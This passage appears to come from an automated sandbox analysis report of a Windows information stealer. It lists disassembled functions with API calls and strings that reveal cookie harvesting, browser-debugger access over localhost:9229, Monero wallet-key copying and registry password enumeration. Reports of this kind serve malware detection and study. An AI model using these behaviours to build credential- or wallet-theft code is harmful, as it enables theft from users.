                                          • Part of subcall function 00189A50: InternetOpenA.WININET(001A0AF6,00000001,00000000,00000000,00000000), ref: 00189A6A
                                        • lstrcat.KERNEL32(?,cookies), ref: 00189CAF
                                        • lstrcat.KERNEL32(?,001A12C4), ref: 00189CC1
                                        • lstrcat.KERNEL32(?,?), ref: 00189CD5
                                        • lstrcat.KERNEL32(?,001A12C8), ref: 00189CE7
                                        • lstrcat.KERNEL32(?,?), ref: 00189CFB
                                        • lstrcat.KERNEL32(?,.txt), ref: 00189D0D
                                        • lstrlen.KERNEL32(00000000), ref: 00189D17
                                        • lstrlen.KERNEL32(00000000), ref: 00189D26
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                        • API String ID: 3174675846-3542011879
                                        • Opcode ID: 4d3c9a70b1cafe0641015cdeb988336d56ce905b3c457907436dd1aaf72aae2d
                                        • Instruction ID: d2f76aa3a5c804d6dd9e8fd218d6203562f30fae48d03fb61d839e6df3e16484
                                        • Opcode Fuzzy Hash: 4d3c9a70b1cafe0641015cdeb988336d56ce905b3c457907436dd1aaf72aae2d
                                        • Instruction Fuzzy Hash: 78517072910608ABCB14EBE0EC95FEE7738AF14301F4045A8F106A7091EF74AB49CF61
                                        Function 00195510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 001862D0: InternetOpenA.WININET(001A0DFF,00000001,00000000,00000000,00000000), ref: 00186331
                                          • Part of subcall function 001862D0: StrCmpCA.SHLWAPI(?,011CE938), ref: 00186353
                                          • Part of subcall function 001862D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186385
                                          • Part of subcall function 001862D0: HttpOpenRequestA.WININET(00000000,GET,?,011CE398,00000000,00000000,00400100,00000000), ref: 001863D5
                                          • Part of subcall function 001862D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0018640F
                                          • Part of subcall function 001862D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186421
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00195568
                                        • lstrlen.KERNEL32(00000000), ref: 0019557F
                                          • Part of subcall function 00198FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00198FE2
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 001955B4
                                        • lstrlen.KERNEL32(00000000), ref: 001955D3
                                        • lstrlen.KERNEL32(00000000), ref: 001955FE
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: bfe7d74126f322b8bb91ebc743ce0634b958b8aac9305b8631dd5f3176e5b000
                                        • Instruction ID: bc9ba412777036f177b330b3c9eb46a4d882c803a3e1aa04122adf93c3676ec6
                                        • Opcode Fuzzy Hash: bfe7d74126f322b8bb91ebc743ce0634b958b8aac9305b8631dd5f3176e5b000
                                        • Instruction Fuzzy Hash: FA510E30914108EBCF18FFA0CDA6AED7779AF21341F904468F50667592EF306B09CB96
                                        Function 00191520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen
                                        • String ID:
                                        • API String ID: 2001356338-0
                                        • Opcode ID: b090bbcf21e330c0308c8e4b418e49d84fbd6b94f4d9cd79944f667875c67fe4
                                        • Instruction ID: acc4abe1561c7409fbe2a946c364d47a7882844dfe057b10edb9ab28272cfe2e
                                        • Opcode Fuzzy Hash: b090bbcf21e330c0308c8e4b418e49d84fbd6b94f4d9cd79944f667875c67fe4
                                        • Instruction Fuzzy Hash: F5C152B5900219ABCF14EF60DC99FDE73B9BF64304F004599E50AA7252DB70EA89CF91
                                        Function 001944D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00198F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00198F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 0019453C
                                        • lstrcat.KERNEL32(?,011CE3F8), ref: 0019455B
                                        • lstrcat.KERNEL32(?,?), ref: 0019456F
                                        • lstrcat.KERNEL32(?,011CCE70), ref: 00194583
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 00198F20: GetFileAttributesA.KERNEL32(00000000,?,00181B94,?,?,001A577C,?,?,001A0E22), ref: 00198F2F
                                          • Part of subcall function 0018A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0018A489
                                          • Part of subcall function 0018A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0018A13C
                                          • Part of subcall function 0018A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0018A161
                                          • Part of subcall function 0018A110: LocalAlloc.KERNEL32(00000040,?), ref: 0018A181
                                          • Part of subcall function 0018A110: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 0018A1AA
                                          • Part of subcall function 0018A110: LocalFree.KERNEL32(0018148F), ref: 0018A1E0
                                          • Part of subcall function 0018A110: CloseHandle.KERNEL32(000000FF), ref: 0018A1EA
                                          • Part of subcall function 00199550: GlobalAlloc.KERNEL32(00000000,0019462D,0019462D), ref: 00199563
                                        • StrStrA.SHLWAPI(?,011CE2D8), ref: 00194643
                                        • GlobalFree.KERNEL32(?), ref: 00194762
                                          • Part of subcall function 0018A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 0018A23F
                                          • Part of subcall function 0018A210: LocalAlloc.KERNEL32(00000040,?,?,?,00184F3E,00000000,?), ref: 0018A251
                                          • Part of subcall function 0018A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 0018A27A
                                          • Part of subcall function 0018A210: LocalFree.KERNEL32(?,?,?,?,00184F3E,00000000,?), ref: 0018A28F
                                        • lstrcat.KERNEL32(?,00000000), ref: 001946F3
                                        • StrCmpCA.SHLWAPI(?,001A08D2), ref: 00194710
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00194722
                                        • lstrcat.KERNEL32(00000000,?), ref: 00194735
                                        • lstrcat.KERNEL32(00000000,001A0FA0), ref: 00194744
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                        • String ID:
                                        • API String ID: 3541710228-0
                                        • Opcode ID: 9c58eb8da021535f3ea2368a11762592f2c19274dcda74692983f3b35a4e43dc
                                        • Instruction ID: 6a530b5bb44b622c249487f79165bc419dc94c4a9f6ec59a6d5c63a488aec99d
                                        • Opcode Fuzzy Hash: 9c58eb8da021535f3ea2368a11762592f2c19274dcda74692983f3b35a4e43dc
                                        • Instruction Fuzzy Hash: C47143B6900208ABDF14EBA0ED95FEE7379AF99300F4445A8F60597141EB34EB48CF95
                                        Function 00181310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 001812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 001812B4
                                          • Part of subcall function 001812A0: RtlAllocateHeap.NTDLL(00000000), ref: 001812BB
                                          • Part of subcall function 001812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001812D7
                                          • Part of subcall function 001812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001812F5
                                          • Part of subcall function 001812A0: RegCloseKey.ADVAPI32(?), ref: 001812FF
                                        • lstrcat.KERNEL32(?,00000000), ref: 0018134F
                                        • lstrlen.KERNEL32(?), ref: 0018135C
                                        • lstrcat.KERNEL32(?,.keys), ref: 00181377
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 00198CF0: GetSystemTime.KERNEL32(001A0E1B,011CA750,001A05B6,?,?,001813F9,?,0000001A,001A0E1B,00000000,?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 00198D16
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00181465
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 0018A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0018A13C
                                          • Part of subcall function 0018A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0018A161
                                          • Part of subcall function 0018A110: LocalAlloc.KERNEL32(00000040,?), ref: 0018A181
                                          • Part of subcall function 0018A110: ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 0018A1AA
                                          • Part of subcall function 0018A110: LocalFree.KERNEL32(0018148F), ref: 0018A1E0
                                          • Part of subcall function 0018A110: CloseHandle.KERNEL32(000000FF), ref: 0018A1EA
                                        • DeleteFileA.KERNEL32(00000000), ref: 001814EF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                        • API String ID: 3478931302-218353709
                                        • Opcode ID: 34af2fdd64ebc732bada19e51d53cbbd07806cde13925e22ffd4e3ec5c437be8
                                        • Instruction ID: d93adf5db5cb1a930c9c5bb003809ecb75c78927948a0f02e8a7e6e9d23919c0
                                        • Opcode Fuzzy Hash: 34af2fdd64ebc732bada19e51d53cbbd07806cde13925e22ffd4e3ec5c437be8
                                        • Instruction Fuzzy Hash: 1D5104719501185BCB15FB60DD92AED737DAF64700F8045E8B60A62092EF706B89CFA5
                                        Function 00189A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenA.WININET(001A0AF6,00000001,00000000,00000000,00000000), ref: 00189A6A
                                        • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00189AAB
                                        • InternetCloseHandle.WININET(00000000), ref: 00189AC7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$Open$CloseHandle
                                        • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                        • API String ID: 3289985339-2144369209
                                        • Opcode ID: 00622f0b92700ecdda8aaa1bcc771515ce5de1da5ab5a05856d3ff7d8ecbfbc7
                                        • Instruction ID: 5a10ae2449b458b2e8690a1c143af0ccc966ada8698b76da902be5a9005e6fb5
                                        • Opcode Fuzzy Hash: 00622f0b92700ecdda8aaa1bcc771515ce5de1da5ab5a05856d3ff7d8ecbfbc7
                                        • Instruction Fuzzy Hash: 17411A35A10258AFCB14EFA4DC95FED77B8BB58740F104099F509AB190CBB0AE80CF64
                                        Function 00187630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00187330: memset.MSVCRT ref: 00187374
                                          • Part of subcall function 00187330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0018739A
                                          • Part of subcall function 00187330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00187411
                                          • Part of subcall function 00187330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0018746D
                                          • Part of subcall function 00187330: GetProcessHeap.KERNEL32(00000000,?), ref: 001874B2
                                          • Part of subcall function 00187330: HeapFree.KERNEL32(00000000), ref: 001874B9
                                        • lstrcat.KERNEL32(00000000,001A192C), ref: 00187666
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 001876A8
                                        • lstrcat.KERNEL32(00000000, : ), ref: 001876BA
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 001876EF
                                        • lstrcat.KERNEL32(00000000,001A1934), ref: 00187700
                                        • lstrcat.KERNEL32(00000000,00000000), ref: 00187733
                                        • lstrcat.KERNEL32(00000000,001A1938), ref: 0018774D
                                        • task.LIBCPMTD ref: 0018775B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                        • String ID: :
                                        • API String ID: 3191641157-3653984579
                                        • Opcode ID: 90062d7abe7ac2defd710444534cd429af9248c4c5c3ed6c0c79e8af3f831e58
                                        • Instruction ID: 945855f839359e2109359db608d5d0a9d1a6ef19fc0c655c19a47cce83393d65
                                        • Opcode Fuzzy Hash: 90062d7abe7ac2defd710444534cd429af9248c4c5c3ed6c0c79e8af3f831e58
                                        • Instruction Fuzzy Hash: 9A314D75904208EFDB04EBA0EC99DEF73B9AB54702F604128F102632A2DF34EA45CF94
                                        Function 00187330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00187374
                                        • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0018739A
                                        • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00187411
                                        • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0018746D
                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 001874B2
                                        • HeapFree.KERNEL32(00000000), ref: 001874B9
                                        • task.LIBCPMTD ref: 001875B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
